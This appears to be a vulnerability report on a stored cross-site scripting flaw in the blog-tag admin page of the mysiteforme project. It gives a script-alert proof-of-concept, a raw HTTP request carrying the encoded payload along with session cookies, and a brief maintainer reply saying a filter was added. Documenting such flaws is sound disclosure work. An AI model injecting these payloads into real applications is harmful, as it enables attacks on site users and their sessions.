There is a stored xss vulnerability exists in mysiteforme

[Vulnerability110]

Cross SIte Scripting (XSS) vulnerability exists in mysiteforme
By accessing the add blog tag function in the blog tag in the background blog management, and inserting the
< script > alert ("XSS") < / script > code, it will be found that an XSS window will pop up on the page after adding successfully.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/wangl1989/mysiteforme
[Affected Component]
POST /admin/blogTags/add HTTP/1.1
Host: localhost:8081
Content-Length: 65
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8081/admin/blogTags/add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628729888; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629343346; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1629683228; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629783006; UM_distinctid=17b76a322159-028d8115bdecb5-3373266-e1000-17b76a32216401; CNZZDATA1255091723=2008929866-1629783007-http%253A%252F%252Flocalhost%253A8080%252F%7C1629783007; _jspxcms=5db6fb498e1443a5be36a3e370535190; _ga=GA1.1.795989054.1631684216; Hm_lvt_8b02a318fde5831da10426656a43d03c=1634114003; JSESSIONID=97051b6c-9fd6-4b2b-a376-282138ee5c91; rememberMe=JpUJ/dmhUExBYZwuZPUqbnXzBEBuBNq2AsV+KoDW3MSp3nqhNUCEFIXXSDvPhHI0YjsTa3dt/+GhbHR3jgQolO1npu3mcTPhDjXKr7U3wX4+PU/U+EnKAgfpPv3UZEsKR2W9rG842kYfHCc758C0FlgJHkFIoeDE+quEZfXu4w8X8M9Fzn1TTCvd2tzbcIRwtOJUeoh8Rmw3DPZXAeHtgJFjdNe/e9Ncq82KD/jO/rQFlvOkKTs10Ku6GagZWDhArGfq4d+pD6HM9FSH8t1eUX0/g9Bi2QoCiF9iwKgwICdiyBS6L43rdbCDaZbdnICAL+BilTqgYhx+SJ48KZF0bTd03gVk+BrvN85UbQ5qzskZ5eUnsDqODbqdE0/UaAkjpdeWI2zaa02mDLWwlpmX8ZCyaANGfKDd7jcVYMbUnXbHclB0vPaJRVb2JtfW8NX8F6uzwo2VDIbUsh89w4iI831h0f+K6ai5uA08IHvy82Op13h350mRA1UxLZFqzS5xalVK9kObu9AnSMF32wN5KNBYLt2Yar94a7cUR/NO07EQLD8bhHfl0wYXffLYTf67BsGiE6P2PWvrtOU+5hDFV4Rp1Gz6qCDBBUKrKKDi0tGDU0Esy12+Bg6OeI/B4qDyEi9cHl3C8zsdxTWj/KRM7el1awwrMfozT1ccCA6XyFvs/KqxNPWW3v+INh+qQYMugGg/c7ryzEMj8JYaixMdddg3sShevK1JjxURWuSsw9HBpDt27yVhWXtm+3Y0WCBRsXKbbKMqlYgkHjxRRTHNUNBtiAXC1xcAt2FXKR+v7nGTMibttZFA5Vzf2fIiBu5zz5wqAg5ObGxsx24VsQMVtG+21rut0nLLhufo847ADIgwhcJ+GtD0xeg1sYvxSoMWEi4gS0XTzy/R9sEIiCaNkA9MOEeuVC/LIDsypINTGLA=
Connection: close

name=%E6%A0%87%E7%AD%BE%3Cscript%3Ealer(%22xss%22)%3C%2Fscript%3E
[Attack Type]
Remote

[Impact Code execution]
true

[wangl1989]

已经添加了filter全线拦截